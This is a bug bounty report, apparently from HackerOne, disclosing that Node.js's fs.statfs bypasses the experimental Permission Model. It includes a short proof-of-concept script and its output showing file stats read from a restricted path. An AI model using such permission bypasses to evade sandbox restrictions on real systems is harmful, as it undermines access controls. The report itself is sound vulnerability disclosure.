Lucene search

K
hackeroneRafaelgssH1:2051224
HistoryJul 05, 2023 - 3:16 p.m.

Node.js: fs.statfs bypasses Permission Model

2023-07-0515:16:06
rafaelgss
hackerone.com
25
node.js
fs.statfs
permission model
restricted paths
file stats
bugbounty

EPSS

0.001

Percentile

43.8%

Summary:

fs.statfs is not limited by the permission model check

Description:

fs.statfs doesn’t throw ERR_ACCESS_DENIED when accessing an restricted path, being able to get stat information of the file

Steps To Reproduce:

touch ./test.js
// index.js
const fs = require('fs')

fs.statfs('./test.js', (err, stats) => {
  console.log('stats', stats)
})
$ node --experimental-permission --allow-fs-read=/path/to/index.js
(node:756097) ExperimentalWarning: Permission is an experimental feature
(Use `node --trace-warnings ...` to show where the warning was created)
stats StatFs {
  type: 61267,
  bsize: 4096,
  blocks: 56377128,
  bfree: 27380986,
  bavail: 24498982,
  files: 14393344,
  ffree: 12478020
}

Impact

Even though it can’t read the file contents, it’s still can perform I/O against that file to retrieve file stats and to check if a file exists.